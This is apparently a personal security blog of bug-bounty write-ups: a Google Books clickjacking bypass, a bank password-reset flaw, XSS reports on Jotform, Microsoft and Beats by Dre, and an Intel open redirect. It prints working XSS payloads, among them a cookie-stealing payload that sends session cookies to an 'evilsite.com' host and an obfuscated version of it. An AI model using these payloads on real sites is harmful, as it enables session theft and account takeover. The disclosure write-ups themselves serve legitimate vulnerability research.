Answer: You can talk about the attacks originating from bot traffic: <a href="https://www.cloudflare.com/learning/bots/what-is-credential-stuffing/">credential stuffing</a>, <a href="https://www.cloudflare.com/learning/bots/what-is-data-scraping/">data scraping</a>, and <a href="https://www.cloudflare.com/learning/ddos/what-is-a-ddos-attack/">DDoS attacks</a>. Then you could go in-depth and talk about various types of DDOS attacks, NTP based amplified DDOS <span class="ILfuVd"><span class="e24Kjd">attack exploits <i>monlist command</i> & finally talk about how you would stop these attacks.</span></span><br />
<br />
<span class="ILfuVd"><span class="e24Kjd">If you answer in this way you can show that you understand the different types of attacks (breadth of knowledge) and you also understand the specific technicalities of attacks (depth of knowledge) </span></span><br />
<span class="ILfuVd"><span class="e24Kjd"><br /></span></span>
To
excel in these interviews it's better to build overall cyber security knowledge along
with the knowledge of common vulnerabilities, being asked to come up with a payload to exploit a very rare
vulnerability is not a norm.<br />
<br />
<h4 style="text-align: left;">
<span style="color: white;"><span style="font-size: large;">#3. It's all about having Cyber Security skills</span></span></h4>
It might sound <span data-dobid="hdw">counter-intuitive</span> but Cyber Security constitutes less than 50% of the overall interview domains, being good in cyber security only won't be sufficient to get you through the interview process.<br />
<br />
Some of the other domains you need to know might be:<br />
<ul style="text-align: left;">
<li>Networking Fundamentals - (OSI, DMZ, Firewalls, DNS) </li>
<li>Competitive Programming - (Optimized Solution, Calculating Space & time complexities)</li>
<li>Code Review - (Ability to read someone's code)</li>
<li>System Design - (More details later in the post)</li>
</ul>
<h4 style="text-align: left;">
<span style="color: white;"><span style="font-size: large;">#4. I am not interviewing for a dev role, I don't need to know Competitive Programming</span></span></h4>
While the majority of the companies might not ask you to solve Competitive Programming questions, there are still few which will ask you. For instance 3 of my interviews (2 screening & 1 onsite) @ Facebook were pure competitive programming interviews. <br />
<br />
The expectation out of this interview is that you should be able to solve easy-medium level competitive programming questions, find optimized solution, space/time complexities and be able to implement the most basic data structures like Sets, Lists, Hash Map etc.<br />
<br />
It's very difficult to build these skills overnight, you should definitely check if your dream company requires you to possess this skill set.<br />
<br />
<h4 style="text-align: left;">
<span style="color: white;"><span style="font-size: large;">#5. Security design interviews should be easy to clear</span></span></h4>
When I found Security Design in my onsite interview schedule @Amazon I searched online a little and didn't find much resources about this topic, so I assumed that I would be asked about WAF, IDS, Encryption etc, like the basic things you need to make a network architecture secure.<br />
<br />
During my interview I was asked to come up with the architecture of a particular type of website, I did it, I made a server, a database and an API gateway, connected all of them together and a cherry on top, I even added a WAF, BoOm!! (it's big brain time). I felt the interview was too easy, but I was not even close, I just missed meeting expectations of that interview by a couple light-years.<br />
<br />
In reality, Security Design interview is a <b>System Design interview</b> with security as a focus area. To get a taste of what a system design interview looks like, <a href="https://www.youtube.com/watch?v=umWABit-wbk" target="_blank">you should look at this video</a>.<br />
<br />
But to summarize, you need to know:<br />
<ul style="text-align: left;">
<li>Data Structures (How would you build an Uber like app? heard about QuadTree Data structure?) </li>
<li>Tradeoffs (Why would you pick a NoSQL DB in comparison to Relational DB?)</li>
<li>Concepts (Consistent Hashing, CAP Theorem etc)</li>
<li>Scaling Strategies (How to vertically & horizontally scale a design, what sharding strategy would you define?) </li>
</ul>
Another interesting, type of security design interview is the one where you'll be given a half-done design and a predefined set of goals. Your interviewer will ask you to add new things and make the design work in such a way that it meets the predefined goals.<br />
<br />
<h4 style="text-align: left;">
<span style="color: white;"><span style="font-size: large;">#6. Behavioral interviews are a piece of cake</span></span></h4>
They are not, your behavioral interviews can last anywhere from 40 mins to 1 whole day (In Amazon all onsite tech interviews are 50% tech and 50% behavioral), during these interviews you will be asked about your past experiences, you should prepare enough examples to last you through 40 mins or 1 day.<br />
<br />
These interviews are also the most important one's; if you fail this then regardless of how good your technical rounds went you will still be rejected. The recommended way to answer these questions is to follow STAR methodology, if you haven't heard about it before, you should definitely <a href="https://theinterviewguys.com/star-method/" target="_blank">check it out.</a><br />
<br />
In a nutshell, behavioral interviews can't be taken for granted and definitely need some prior preparation.<br />
<br />
<h4 style="text-align: left;">
<span style="color: white;"><span style="font-size: large;">#7. The interviewer is interviewing to find flaws & weaknesses</span></span></h4>
It may come as a surprise but interviewers at these companies would actually want you to perform well in the interviews, with most of these companies you would have a <a href="https://observer.com/2017/03/interview-preparation-tips-salary-dress-code-negotiations/" target="_blank">Prep call</a>, where they will walk you through the interview process & tell you what to expect during the interview. Some of the companies would even go to an extent where they will buy you an online course to prepare for the interviews better.<br />
<br />
I can't explain this with facts & metrics, but if you change your perspective from "interviewer is interviewing you to find your flaws" to "interviewer is interviewing you to succeed" you'll be more comfortable giving the interview; this works like magic there's no explanation to that.<br />
<br />
Finally, if you have an upcoming interview all the best :) Or if you're in the process of preparing for the interviews here are some good resources I found <a href="https://github.com/gracenolan/Notes/blob/master/interview-study-notes-for-security-engineering.md" target="_blank">Security Engineering at Google: My Interview Study Notes</a> and <a href="https://haiderm.com/my-experience-with-google-interview-for-information-security-engineer/" target="_blank">My experience with Google interview for information security engineer.</a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com2tag:blogger.com,1999:blog-7421436727677135031.post-10213525710421790732017-10-15T10:46:00.000-07:002017-10-15T11:08:57.911-07:00[Writeup] How i bypassed XFrame options protection at Google Books<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
Hi There,<br />
<br />
This is an long delayed writeup, i had reported this vulnerability around the month of march this year, but didn't realized that the bug was fixed until now.<br />
<br />
Let's get started,<br />
<br />
<b>Abstract:</b><br />
<br />
Google Books has implemented <a href="https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options" rel="nofollow" target="_blank">X-Frame-Options</a> header for protection against <a href="https://www.owasp.org/index.php/Clickjacking" rel="nofollow" target="_blank">ClickJacking attack</a>.<br />
I was able to bypass this protection and clickjack Google Books Dashboard.<br />
<b><br /></b>
<b>Background: </b><br />
<br />
So on one good evening when i was checking out some books on Google i came across this preview page which for some strange reason looked vulnerable to me and i started testing it out. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-LFAZ0QsUSys/WeNc97BkKCI/AAAAAAAAAE0/L90NaBFSfRMSgY4N_OuokBneKHtfAjI5ACLcBGAs/s1600/book%2Bpreview.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="843" data-original-width="1600" height="336" src="https://4.bp.blogspot.com/-LFAZ0QsUSys/WeNc97BkKCI/AAAAAAAAAE0/L90NaBFSfRMSgY4N_OuokBneKHtfAjI5ACLcBGAs/s640/book%2Bpreview.JPG" width="640" /></a></div>
<br />
While testing the webpage i found that Google allows it's books to be embedded into another webpage by using an embed code.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-GM_OM71ePgY/WeNgZvqTGYI/AAAAAAAAAFA/pItqSEv2H8o2jJojKkhJzxaB9WKFjGGVwCLcBGAs/s1600/embed.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="241" data-original-width="614" height="156" src="https://3.bp.blogspot.com/-GM_OM71ePgY/WeNgZvqTGYI/AAAAAAAAAFA/pItqSEv2H8o2jJojKkhJzxaB9WKFjGGVwCLcBGAs/s400/embed.JPG" width="400" /></a></div>
<br />
This is an example embed code <br />
<br />
<blockquote class="tr_bq">
<iframe frameborder="0" scrolling="no" style="border:0px" src="https://books.google.co.in/books?id=YJKbVzeabJYC&lpg=PP1&dq=web%20application%20hackers&pg=PP1&output=embed" width=500 height=500></iframe></blockquote>
By reading the code one could easily tell that the X-Frame-Options header protection will be turned off for the IFrame Source URL to make it framable on another webpage.<br />
<br />
The HTTP response headers of the embed code is.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-CI_Xjs-W79I/WeNjP59HY1I/AAAAAAAAAFQ/6JyDdmssVOYsnqBpj8LbxzbbjKZ-62_lQCLcBGAs/s1600/nope.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="300" data-original-width="354" height="270" src="https://4.bp.blogspot.com/-CI_Xjs-W79I/WeNjP59HY1I/AAAAAAAAAFQ/6JyDdmssVOYsnqBpj8LbxzbbjKZ-62_lQCLcBGAs/s320/nope.JPG" width="320" /></a></div>
<br />
By comparing the framable URL with the original Google eBook URL, I found an interesting parameter <b>output=embed</b><br />
<br />
<blockquote class="tr_bq">
<b>Original webpage URL </b><br />
https://books.google.co.in/books?id=YJKbVzeabJYC&printsec=frontcover&dq=web+application+hackers&hl=en&sa=X&redir_esc=y#v=onepage&q&f=false</blockquote>
<blockquote class="tr_bq">
<b>Framable</b> <b>URL</b><br />
https://books.google.co.in/books?id=YJKbVzeabJYC&lpg=PP1&dq=web%20application%20hackers&pg=PP1&<u><b>output=embed</b></u></blockquote>
<br />
Using this parameter Google was removing X-Frame-Options and making a book framable.<br />
<br />
Now the question is will this parameter remove X-Frame-Options from any other webpage and make it framable?<br />
<br />
Answer: Yes<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-sSd1aj4RLVM/WeN4dlmi-OI/AAAAAAAAAF4/wJxvtzgzkxYCVJwcOnZw5d4ALObJHXHlQCLcBGAs/s1600/new%2B49.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="767" data-original-width="792" height="618" src="https://4.bp.blogspot.com/-sSd1aj4RLVM/WeN4dlmi-OI/AAAAAAAAAF4/wJxvtzgzkxYCVJwcOnZw5d4ALObJHXHlQCLcBGAs/s640/new%2B49.png" width="640" /></a></div>
<br />
<br />
<blockquote class="tr_bq">
<b>HTTP Response of Google books Dashboard</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-3r55bCZkrZc/WeN6RTTRYPI/AAAAAAAAAGE/ZaQvQ1LRpd0k5YHB7KcZjGtCkI3IUUXqACLcBGAs/s1600/yes1%2Bxframe%2B-%2BCopy.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="261" data-original-width="976" height="171" src="https://1.bp.blogspot.com/-3r55bCZkrZc/WeN6RTTRYPI/AAAAAAAAAGE/ZaQvQ1LRpd0k5YHB7KcZjGtCkI3IUUXqACLcBGAs/s640/yes1%2Bxframe%2B-%2BCopy.JPG" width="640" /></a></div>
</blockquote>
<br />
<blockquote class="tr_bq">
<b>HTTP Response of Google books Dashboard with output=embed parameter</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-qn3kWK51n60/WeN6bY0BZfI/AAAAAAAAAGI/Twa_5VtiOowxR-_0KvzcgZfdAJ3FTgT-QCLcBGAs/s1600/no1%2Bxframe%2B-%2BCopy.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="246" data-original-width="981" height="158" src="https://4.bp.blogspot.com/-qn3kWK51n60/WeN6bY0BZfI/AAAAAAAAAGI/Twa_5VtiOowxR-_0KvzcgZfdAJ3FTgT-QCLcBGAs/s640/no1%2Bxframe%2B-%2BCopy.JPG" width="640" /></a></div>
</blockquote>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<b>Impact:</b> Just by making 2 clicks on Proof-of-Concept webpage all books from your bookshelf could be deleted.<br />
<br />
<b>Reward: </b>$500<br />
<br />
Thanks for Reading :) </div>
</div>
<div>
</div>
</div>
</div>
</div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com3tag:blogger.com,1999:blog-7421436727677135031.post-60651623940856670422017-07-29T10:30:00.000-07:002017-10-15T10:33:31.585-07:00[Writeup] How i prevented a bank from getting robbed<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://images.vice.com/motherboard/content-images/article/33643/1463424233283353.jpg?crop=0.888888888888889xw:1xh;center,center&resize=1050:*" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://images.vice.com/motherboard/content-images/article/33643/1463424233283353.jpg?crop=0.888888888888889xw:1xh;center,center&resize=1050:*" width="640" /></a></div>
<div>
</div>
<div>
</div>
<div>
<br />
This story is about a loophole in an Online Banking website which could have allowed an attacker to steal funds from any customer account. After discovering this issue i immediately got in touch with the bank's security team and coordinated till a patched for this loophole was released. In this writeup i can't share the exact technical details about how i exploited the issue on the target website but i can give you a generalized idea of what went wrong and how it could have been exploited. <br />
<br />
<b>Abstract: </b><br />
There was a bug in the forget password module of a netbanking website by exploiting which an attacker could have updated any customer's netbanking account password to his desired value.<br />
<div>
<br /></div>
</div>
<div>
To understand the exploit, we first need to understand how password recovery works on the target bank's website.<br />
<br /></div>
<div>
Here is normal flow of password recovery process which can be initiated by visiting the forget password page:<br />
</div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-0OOWMoe5mxc/WNZap2iL-RI/AAAAAAAAAEY/95FlrFdYg1AlWLJ9o8oIR7NjNvDwxLCfgCLcB/s1600/Picture1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="https://4.bp.blogspot.com/-0OOWMoe5mxc/WNZap2iL-RI/AAAAAAAAAEY/95FlrFdYg1AlWLJ9o8oIR7NjNvDwxLCfgCLcB/s640/Picture1.png" width="640" /></a></div>
<br />
To recover a forgotten password on the netbanking website a customer has to follow this following process:<br />
<br />
<b>Step 1: </b>Identify account using customer id. <br />
<b>Step 2: </b>Submit an OTP( One Time Password) which will be sent via SMS & Email.<br />
<b>Step 3:</b> Set a new password.<br />
<br />
After following this process customer's password will be updated.<br />
<br />
During my research, I found out that the webpage at "Step 3" was not validating if the customer has completed "Step 2" (OTP Verification).<br />
<br />
</div>
<div>
<b>The Exploit:</b></div>
<div>
<br /></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-i8AMP13n04k/WNZa73LALkI/AAAAAAAAAEc/-FSo8Tgt6VIeA-mb0-rrARhgnOccq4pgwCLcB/s1600/Picture2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="347" src="https://1.bp.blogspot.com/-i8AMP13n04k/WNZa73LALkI/AAAAAAAAAEc/-FSo8Tgt6VIeA-mb0-rrARhgnOccq4pgwCLcB/s640/Picture2.png" width="640" /></a></div>
</div>
To exploit this issue and attacker has to complete "Step 1" -> Generate a
Session ID -> Submit this Session ID to "Step 3" endpoint along with
the new password which wants to be set for the account.<br />
<br />
After making the post request the customer's netbanking password will be updated. Since the customer ID's on the netbanking website were numerical an attacker could have made an script that will reset every netbanking account's password and transfer funds out of it. <br />
<br />
<blockquote class="tr_bq">
At the end of the day this incident was a good test of my hacker ethics and taught me lessons which i will carry on throught my life. </blockquote>
<br />
Thanks for reading & hack for good :)</div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com2tag:blogger.com,1999:blog-7421436727677135031.post-61961839439607574052017-02-20T00:28:00.001-08:002017-03-25T03:27:40.895-07:00[Vulnerability Report] Persistent XSS at Jotform<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-Q-TI4Q9SL6k/WNZF9xtSwfI/AAAAAAAAADw/Bd7t5vo93WcI5UNCPDeS1MR4ym8gvfBWwCLcB/s1600/jotform.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://4.bp.blogspot.com/-Q-TI4Q9SL6k/WNZF9xtSwfI/AAAAAAAAADw/Bd7t5vo93WcI5UNCPDeS1MR4ym8gvfBWwCLcB/s400/jotform.jpg" width="400" /></a></div>
Persistent XSS @ Developers section<br />
<br />
<b>Vulnerable Service: </b>https://developers.jotform.com<br />
<br />
<b>Description: </b>The service mentioned above is vulnerable to Persistent XSS, due to which an attacker is able to steal user cookies which may lead to account hijacking.<br />
<br />
<b>Demo XSS thread:</b><br />
<i>https://developers.jotform.com/forum/post/<Removed></i><br />
- Click on "For Testing Purposes" to see the alert message.<br />
<br />
<b>Payload:</b> javascript:alert('I_Am_Vulnerable_To_XSS');<br />
<br />
<b>Steps of Reproduction:</b><br />
-Create a new thread & in thread editor click "Add hyperlink" button.<br />
-Now instead of URL, paste payload there.<br />
-"http://" will be automatically added to the payload, you need to remove that.<br />
<br />
<b>Proof of Concept:</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-wlqbN-CAELI/WKqzIfypt5I/AAAAAAAAABU/M8eWh8DEo5UM9MC-kXc4iokgVKbfKK8YgCLcB/s1600/jotform%2BPersistent%2BXSS.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="345" src="https://2.bp.blogspot.com/-wlqbN-CAELI/WKqzIfypt5I/AAAAAAAAABU/M8eWh8DEo5UM9MC-kXc4iokgVKbfKK8YgCLcB/s640/jotform%2BPersistent%2BXSS.JPG" width="640" /></a></div>
<b><br /></b> <b>Bounty:</b><br />
<b><br /></b>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-Mi_pJiesGRM/WKq0GuestdI/AAAAAAAAABc/kVEEPvONPVgaPa0CR17tXOEJOlbNMZJjgCLcB/s1600/Screenshot_2017-02-08-10-57-13-994_com.google.android.gm.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://4.bp.blogspot.com/-Mi_pJiesGRM/WKq0GuestdI/AAAAAAAAABc/kVEEPvONPVgaPa0CR17tXOEJOlbNMZJjgCLcB/s400/Screenshot_2017-02-08-10-57-13-994_com.google.android.gm.png" width="225" /></a></div>
<b><br /></b></div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com0tag:blogger.com,1999:blog-7421436727677135031.post-68917366580986864052016-12-23T04:27:00.001-08:002017-03-25T03:28:41.533-07:00[Vulnerability Report] Non-persistent XSS at Microsoft<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-9tFKiUnHI0Q/WNZGUhwsceI/AAAAAAAAAD0/WKuySZ-60PgwxSGV7PjAl4AizHOGLiayQCLcB/s1600/Microsoft_logo_%25282012%2529.svg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://1.bp.blogspot.com/-9tFKiUnHI0Q/WNZGUhwsceI/AAAAAAAAAD0/WKuySZ-60PgwxSGV7PjAl4AizHOGLiayQCLcB/s640/Microsoft_logo_%25282012%2529.svg.png" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<b></b></div>
<b> </b></div>
<div>
</div>
<div>
<b> </b>I had found a reflected XSS issue Microsoft, below is the report.</div>
<div>
</div>
<div>
<br />
<span style="font-family: "tahoma" , "verdana" , "arial"; font-size: x-small;">------------------- <span style="font-family: "tahoma" , "verdana" , "arial";">Email starts here</span> -------------------</span></div>
<div>
</div>
<div>
<b>Vulnerability Type:</b> Non Persistent XSS</div>
<div>
</div>
<div>
<b>Abstract: </b>The affected url is vulnerable to Non-persistent XSS due to which an attacker is able to take over Microsoft account of logged in user.</div>
<div>
</div>
<div>
<b>Affected Url:</b> <i>https://www.microsoft.com/en-us/research/search/?q=<script>;prompt()<script></i></div>
<div>
</div>
<div>
<b>Payload:<i> </i></b><i><script>;prompt()</script></i></div>
<div>
</div>
<div>
<b>Vulnerability Impact Senario: </b>With Non Persistent Cross Site Scripting(XSS) an attacker can create custom URL with cookie stealing code on visiting which a user's cookie can be stolen and his account can be hijacked.</div>
<div>
</div>
<div>
<b>Vulnerability Reproduction Steps(POC):</b><br />
<br />
1. Visit the URL <i>"https://www.microsoft.com/en-us/research/search/?q="</i><br />
2. With the parameter<i> "q="</i> we can inject our payload.</div>
<br />
<div>
<b>Brief description of the issue:</b></div>
<div>
</div>
This vulnerability is caused due to validation present only on the Search textbox present on the webpage. And no validation is present if we provide the same malicious HTML payload directly through the URL.<br />
<br />
<b>Proof of Concept:</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-5aA8OLJhOr0/WKq1WLd4BFI/AAAAAAAAABw/s1-9tHhmE4YX2A0M815zxeirCdcwlNA7gCLcB/s1600/Microsoft%2BXSS.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="340" src="https://4.bp.blogspot.com/-5aA8OLJhOr0/WKq1WLd4BFI/AAAAAAAAABw/s1-9tHhmE4YX2A0M815zxeirCdcwlNA7gCLcB/s640/Microsoft%2BXSS.JPG" width="640" /></a></div>
<br />
<br />
<b>Hall Of Fame:</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-ELgL5gxlpA8/WKq0j7Dd8pI/AAAAAAAAABk/srDwx3hqjLMS5u5slMkyitWvq1cel_KLwCLcB/s1600/Microsoft%2BSeptember.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-ELgL5gxlpA8/WKq0j7Dd8pI/AAAAAAAAABk/srDwx3hqjLMS5u5slMkyitWvq1cel_KLwCLcB/s1600/Microsoft%2BSeptember.JPG" /></a></div>
<br /></div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com0tag:blogger.com,1999:blog-7421436727677135031.post-34316724957606182192016-12-23T04:22:00.000-08:002016-12-23T04:22:43.951-08:00[Vulnerability Report] Open Redirect on multiple subdomains of Intel<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://logos-download.com/wp-content/uploads/2016/02/Intel_logo_png_transparent_huge.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://logos-download.com/wp-content/uploads/2016/02/Intel_logo_png_transparent_huge.png" height="262" width="400" /></a></div>
<div>
<strong><span style="font-family: Tahoma, Verdana, Arial; font-size: x-small;"> </span></strong></div>
<div>
<strong><span style="font-family: Tahoma, Verdana, Arial; font-size: x-small;"> </span></strong></div>
<div>
<strong><span style="font-family: Tahoma, Verdana, Arial; font-size: x-small;"> </span></strong></div>
<div>
<strong><span style="font-family: Tahoma, Verdana, Arial; font-size: x-small;"> </span></strong></div>
<div>
<strong><span style="font-family: Tahoma, Verdana, Arial; font-size: x-small;">------------------- Original Message -------------------</span> </strong></div>
<div>
<strong> </strong></div>
<div>
<strong>Vulnerablility Type:</strong> Open Redirect ( <em>https://www.owasp.org/index.php/Open_redirect </em>)</div>
<div>
</div>
<div>
<strong>Vulnerable URL:</strong> <em> </em></div>
<div>
<em> </em><em> </em><br /><em></em></div>
<div>
<em>https://communities.intel.com/terms-and-conditions!input.jspa?url=http://evilsite.com</em></div>
<div>
<em><em>https://<private>.intel.com/external-link.jspa?url=http://evilsite.com</em> </em></div>
<div>
</div>
<div>
<strong>Summary:</strong> An open redirect is an application that
takes a parameter and redirects a user to the parameter value without
any validation. This vulnerability is used in phishing attacks to get
users to visit malicious sites without realizing it.</div>
<div>
</div>
<div>
In the URL described above the parameter <strong>url= </strong>is
vulnerable to open redirect. An attacker is able to provide a custom URL
where the victim will be redirected. An attacker can impersonate his
malicious URL as Intel's</div>
<div>
</div>
<div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-WnsbWz5G7oQ/WF0WA9_iUgI/AAAAAAAAAAo/3B4YG1LTc7AGnwkLF-IgLYXfpqtggWJpQCLcB/s1600/7_26_ResearcherCertificate_Amit_Kumar.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="290" src="https://1.bp.blogspot.com/-WnsbWz5G7oQ/WF0WA9_iUgI/AAAAAAAAAAo/3B4YG1LTc7AGnwkLF-IgLYXfpqtggWJpQCLcB/s400/7_26_ResearcherCertificate_Amit_Kumar.jpg" width="400" /></a></div>
<div>
</div>
</div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com0tag:blogger.com,1999:blog-7421436727677135031.post-4524217679192577882016-07-07T05:47:00.000-07:002016-07-07T05:47:12.671-07:00[Vulnerability Report] Non-Persistent XSS on Beats By Dre<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="irc_mimg irc_hic ibE5E2ITjHEA-lvVgf-rIiHk">
<div class="separator" style="clear: both; text-align: center;">
<a href="http://logok.org/wp-content/uploads/2014/08/beats-by-dr-dre-logo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://logok.org/wp-content/uploads/2014/08/beats-by-dr-dre-logo.png" height="300" width="400" /></a></div>
---------Following is the email which i had sent to Apple Product Security----------<br />
<br />
<div class="irc_mimg irc_hic isteg9hIBh0k-lvVgf-rIiHk">
</div>
</div>
<div class="irc_mimg irc_hic ibE5E2ITjHEA-lvVgf-rIiHk">
</div>
<div class="irc_mimg irc_hic ibE5E2ITjHEA-lvVgf-rIiHk">
<b>Vulnerability type:</b> Non-Persistent XSS</div>
<br />
<b>Affected URL:</b> <i><a href="https://deref-mail-02.com/mail/client/dereferrer/?redirectUrl=https%3A%2F%2Ftempo.api.beatsbydre.com%2Fv1%2Flogin%2F%3Freturn%3D%2522%253E%253C%2Fform%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%2Fscript%253E" target="_blank">https://tempo.api.beatsbydre.com/v1/login/?return=%22%3E%3C/form%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E</a></i><br />
<br />
<b>Attack Scenario: </b>An attacker is able to trick an authenticated user into visiting a malicious URL,<br />
which is capable of stealing user's session and take over his apple account.<br />
<br />
Best Regards<br />
Amit Kumar<br />
<i>cse@engineer.com</i><br />
<i>-------------------------------------------------------------------------------------------------------------------------</i><br />
<br />
<b>Preview:</b><br />
<b> </b><i> </i><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://s27.postimg.org/cgie9giar/sdfsdsd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://s27.postimg.org/cgie9giar/sdfsdsd.png" /></a></div>
<i> </i></div>
Amit Sangrahttp://www.blogger.com/profile/02128783782420783002noreply@blogger.com1tag:blogger.com,1999:blog-7421436727677135031.post-79027865674030162812016-07-05T04:07:00.003-07:002017-03-25T03:33:49.659-07:00[Vulnerability Report] Persistent XSS on Microsoft.com <div dir="ltr" style="text-align: left;" trbidi="on">
<ul class="actions article-actions article-footer-actions"><br /></ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-cu4P647hLog/WNZHWwHvPPI/AAAAAAAAAEA/FEKR3SMubLkC_UIBU9JdMZBxHO5xocaXwCEw/s1600/microsoft-logo.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://2.bp.blogspot.com/-cu4P647hLog/WNZHWwHvPPI/AAAAAAAAAEA/FEKR3SMubLkC_UIBU9JdMZBxHO5xocaXwCEw/s640/microsoft-logo.jpg" width="640" /></a></div>
<ul class="actions article-actions article-footer-actions"><br />Report: Get your Microsoft account hijacked by simply clicking connect button<div class="prose">
<br />
The following is my report on a serious vulnerability which I had discovered on Microsoft.com, for which I was also awarded a place at <em>Microsoft Hall of Fame</em>.<br />
<br />
<em>------------------Following is the email which I had sent to MSRC------------------</em><br />
<br />
<em>Amit Kumar <cse@engineer.com> wrote:</em><br />
<br />
Hello, My name is Amit Kumar I am a security researcher, The following is my report on a medium-high risk vulnerability which is present on Microsoft's social profile page.<br />
<br />
<strong>Test Account:</strong> <em>MSOBBcse@outlook.com </em><br />
<br />
<strong>Vulnerability Type:</strong> Persistent XSS<br />
<br />
<strong>Affected URL:</strong><em> https://social.microsoft.com/Profile/MSOBB_Test_Account</em><br />
<em>https://social.<strong>msdn</strong>.microsoft.com/Profile/MSOBB_Test_Account</em><br />
<br />
<strong>Abstract:</strong> The affected URL is vulnerable to persistent XSS due to which an attacker is able to hijack user account sessions.<br />
<br />
<strong>Scope:</strong> Social Connect buttons( Twitter, Facebook, LinkedIn, XING ) of affected URL.<br />
<br />
<strong>Risk Level:</strong> Medium-High<br />
<br />
<strong>Vulnerability Impact Scenario:</strong> A user visits an affected profile, and clicks the facebook icon under contact section after which he is redirected to attacker's facebook profile which is normal for the user. But in the backend, his session cookies were sent as a get request to the attacker's webserver where they were stored, after that the user was redirected to the attacker's facebook profile as he was expecting.<br />
<br />
<strong>Payload:</strong><em> javascript:location.href=("http://evilsite.com?q.php?cookie="+document.cookie)</em> <br />
<br />
<strong>Obfuscated Payload:</strong><em> javascript:/*http://facebook.com/profile.php?id=6735824l987&</em><br />
<em>redirect=*/location.href%3D%28%22http%3A%2f%2fevilsite.com%3Fq.php%3Fcookie%3D%22%2bdocument.cookie%29</em><br />
(Contains noise and obsfucated code so that a normal user is not able to identify the malicious code by just hovering over the social buttons)<br />
<br />
<strong>Tools Used:</strong><br />
Firefox +Addon: TamperData<br />
<em>Note: Screenshots are included in the attachments.</em> <br />
<br />
<strong>Vulnerability Reproduction Steps(POC):</strong> <br />
<br />
1. Visit the URL<em> "https://social.microsoft.com/Profile/u/edit"</em> <br />
<br />
2. Add facebook profile URL such as,<em> "http://facebook/com/demouser"</em> <br />
<br />
